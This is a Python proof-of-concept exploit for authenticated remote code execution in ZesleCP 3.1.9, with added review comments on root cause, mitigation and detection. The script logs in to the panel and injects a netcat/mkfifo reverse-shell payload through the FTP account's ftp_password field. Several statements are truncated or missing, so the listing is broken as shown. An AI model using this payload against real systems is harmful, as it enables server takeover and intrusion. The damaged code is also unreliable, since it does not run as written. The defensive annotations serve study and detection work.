ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
# author:
# usage: [-h] -u HOST -l LOGIN -p PASSWORD
import argparse,requests,warnings,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd
# Parse the command-line options listed in the usage line: host, login and
# password, all three required.
# NOTE(review): the password is accepted as a command-line argument, so it can
# end up in shell history and in process listings on the machine running this.
# NOTE(review): as shown on this page the function assigns `args` but neither
# returns it nor passes it on; the rest of the body appears to be missing.
def init():
parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )')
parser.add_argument('-u','--host',help='Host', type=str, required=True)
parser.add_argument('-l', '--login',help='Username', type=str, required=True)
parser.add_argument('-p', '--password',help='Password', type=str, required=True)
args = parser.parse_args()
# Proof of concept for the authenticated command injection named in the file
# header (ZesleCP 3.1.9): it logs in to the panel on port 2087 with the
# supplied credentials, then submits an FTP-account request whose
# ftp_password field carries shell syntax.
# NOTE(review): several statements below are incomplete on this page
# (extraction damage), so the listing does not parse as shown. The comments
# describe only what the visible lines establish.
def exploit(args):
listen_ip = ""
listen_port = 1337
session = requests.Session()
target = "https://{}:2087".format(
username = args.login
password = args.password
print("[+] Target {}".format(target))
# verify=False switches off TLS certificate validation for this request, so
# the credentials in the JSON body go to whatever host answers on that address.
login ="/login", verify=False, json={"username":username,"password":password})
# The login response is parsed as JSON; its "success" field selects the branch.
login_json = json.loads(login.content)
if login_json["success"]:
# The session cookies are copied into a dict; no visible line reads it afterwards.
session_hand_login = session.cookies.get_dict()
print("[+] Login successfully")
print("[+] Creating ftp account")
# Random 10-character account name (lowercase letters and digits).
ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))
print("[+] Username : {}".format(ftp_username))
print("[+] Send payload....")
# Root cause, inferred from the shape of the value rather than from server
# code (none is on this page): ftp_password opens with a closing single quote
# and ends with `echo '`, which only makes sense if the panel interpolates the
# password into a single-quoted shell command without escaping it.
# Mitigation on the server side: never build a shell command line from request
# fields; hand the password to the helper as a separate argv element or on
# stdin, and reject quotes and shell metacharacters at input validation.
# Detection: authenticated POSTs to /core/ftp whose ftp_password contains
# quote, semicolon or pipe characters; a FIFO appearing at /tmp/f; sh or nc
# processes started by the panel (presumably under its service account).
payload = {
"ftp_user": ftp_username,
"ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port)
# timeout=3 together with the ReadTimeout handler below: the script reports
# success when no response arrives within 3 seconds.
# NOTE(review): presumably the request blocks while the injected command runs,
# so requests to this endpoint that hang are themselves worth alerting on.
# Certificate validation is disabled here as well (verify=False).
feth_weblist ="/core/ftp", verify=False, json=payload, timeout=3)
except requests.exceptions.ReadTimeout:
print("[+] Successful")
# Failure path: prints the "message" field from the login response.
print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))
# Script entry-point guard; the statements it runs are not present on this page.
if __name__ == "__main__":